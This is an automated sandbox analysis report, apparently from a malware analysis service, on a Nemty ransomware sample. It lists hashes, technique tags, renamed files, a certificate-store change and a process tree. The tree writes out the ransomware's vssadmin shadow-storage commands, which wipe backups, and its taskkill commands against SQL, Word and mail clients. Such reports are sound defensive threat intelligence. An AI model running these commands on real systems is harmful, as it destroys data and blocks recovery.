nemty | a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07

General

Target

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Size

207KB
MD5

ae24eb430be3d0598b7510bba484f580
SHA1

9b6a75b930e8ea41578ec0a6d3df2259a6990d1d
SHA256

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07
SHA512

ca5ec7ca780642bc0105a84c7f4eea60b826d36429ecdceb2a9bb27f2ce688909a6953d18bd9884b19a36604a8c170876c6997c743ca3dbe44ecdfd4a142042a

Score

10^/10

nemty ransomware suricata

Malware Config

Signatures

Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
ransomware nemty
suricata: ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompleteSubmit.raw => C:\Users\Admin\Pictures\CompleteSubmit.raw.NEMTY_O85YRFZ	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
File renamed	C:\Users\Admin\Pictures\DebugUse.crw => C:\Users\Admin\Pictures\DebugUse.crw.NEMTY_O85YRFZ	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
File renamed	C:\Users\Admin\Pictures\MeasureUpdate.tif => C:\Users\Admin\Pictures\MeasureUpdate.tif.NEMTY_O85YRFZ	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
File opened for modification	C:\Users\Admin\Pictures\StepGet.tiff	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
File renamed	C:\Users\Admin\Pictures\StepGet.tiff => C:\Users\Admin\Pictures\StepGet.tiff.NEMTY_O85YRFZ	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 api.db-ip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

6116 schtasks.exe
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

3692 vssadmin.exe
1208 vssadmin.exe
5372 vssadmin.exe

flow	ioc
19	api.db-ip.com

pid	process
6116	schtasks.exe

pid	process
3692	vssadmin.exe
1208	vssadmin.exe
5372	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4780	taskkill.exe
4916	taskkill.exe
4992	taskkill.exe
4304	taskkill.exe
4824	taskkill.exe
5072	taskkill.exe
4792	taskkill.exe
4828	taskkill.exe
5000	taskkill.exe
5092	taskkill.exe
5144	taskkill.exe
4696	taskkill.exe
4384	taskkill.exe
4884	taskkill.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

pid	process
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

vssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	4016	vssvc.exe
Token: SeRestorePrivilege	4016	vssvc.exe
Token: SeAuditPrivilege	4016	vssvc.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	5000	taskkill.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	5092	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	5072	taskkill.exe
Token: SeDebugPrivilege	5144	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5228	WMIC.exe
Token: SeSecurityPrivilege	5228	WMIC.exe
Token: SeTakeOwnershipPrivilege	5228	WMIC.exe
Token: SeLoadDriverPrivilege	5228	WMIC.exe
Token: SeSystemProfilePrivilege	5228	WMIC.exe
Token: SeSystemtimePrivilege	5228	WMIC.exe
Token: SeProfSingleProcessPrivilege	5228	WMIC.exe
Token: SeIncBasePriorityPrivilege	5228	WMIC.exe
Token: SeCreatePagefilePrivilege	5228	WMIC.exe
Token: SeBackupPrivilege	5228	WMIC.exe
Token: SeRestorePrivilege	5228	WMIC.exe
Token: SeShutdownPrivilege	5228	WMIC.exe
Token: SeDebugPrivilege	5228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5228	WMIC.exe
Token: SeRemoteShutdownPrivilege	5228	WMIC.exe
Token: SeUndockPrivilege	5228	WMIC.exe
Token: SeManageVolumePrivilege	5228	WMIC.exe
Token: 33	5228	WMIC.exe
Token: 34	5228	WMIC.exe
Token: 35	5228	WMIC.exe
Token: 36	5228	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5228	WMIC.exe
Token: SeSecurityPrivilege	5228	WMIC.exe
Token: SeTakeOwnershipPrivilege	5228	WMIC.exe
Token: SeLoadDriverPrivilege	5228	WMIC.exe
Token: SeSystemProfilePrivilege	5228	WMIC.exe
Token: SeSystemtimePrivilege	5228	WMIC.exe
Token: SeProfSingleProcessPrivilege	5228	WMIC.exe
Token: SeIncBasePriorityPrivilege	5228	WMIC.exe
Token: SeCreatePagefilePrivilege	5228	WMIC.exe
Token: SeBackupPrivilege	5228	WMIC.exe
Token: SeRestorePrivilege	5228	WMIC.exe
Token: SeShutdownPrivilege	5228	WMIC.exe
Token: SeDebugPrivilege	5228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5228	WMIC.exe
Token: SeRemoteShutdownPrivilege	5228	WMIC.exe
Token: SeUndockPrivilege	5228	WMIC.exe
Token: SeManageVolumePrivilege	5228	WMIC.exe
Token: 33	5228	WMIC.exe
Token: 34	5228	WMIC.exe
Token: 35	5228	WMIC.exe
Token: 36	5228	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.execmd.execmd.exe

description	pid	process	target process
PID 4084 wrote to memory of 2932	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2932	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2932	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2032	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2032	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2032	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 2932 wrote to memory of 3692	2932	cmd.exe	vssadmin.exe
PID 2932 wrote to memory of 3692	2932	cmd.exe	vssadmin.exe
PID 2932 wrote to memory of 3692	2932	cmd.exe	vssadmin.exe
PID 2032 wrote to memory of 1208	2032	cmd.exe	vssadmin.exe
PID 2032 wrote to memory of 1208	2032	cmd.exe	vssadmin.exe
PID 2032 wrote to memory of 1208	2032	cmd.exe	vssadmin.exe
PID 4084 wrote to memory of 1776	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1776	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1776	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1756	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1756	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1756	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2668	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2668	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2668	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2096	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2096	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2096	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4012	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4012	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4012	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1312	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1312	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1312	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2596	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2596	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2596	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1524	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1524	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1524	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3680	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3680	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 3680	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2644	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2644	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 2644	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1828	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1828	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1828	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1336	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1336	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1336	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 1872	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4132	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4132	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4132	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4168	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4168	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4168	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4236	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4236	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4236	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe
PID 4084 wrote to memory of 4276	4084	a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
"C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"
1⤵
- Modifies extensions of user files
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
- Suspicious use of WriteProcessMemory
PID:2932

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:3692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.*
2⤵
PID:1776

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sql.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.*
2⤵
PID:1756

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im winword.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im thunderbird.*
2⤵
PID:4012

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im thunderbird.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im outlook.*
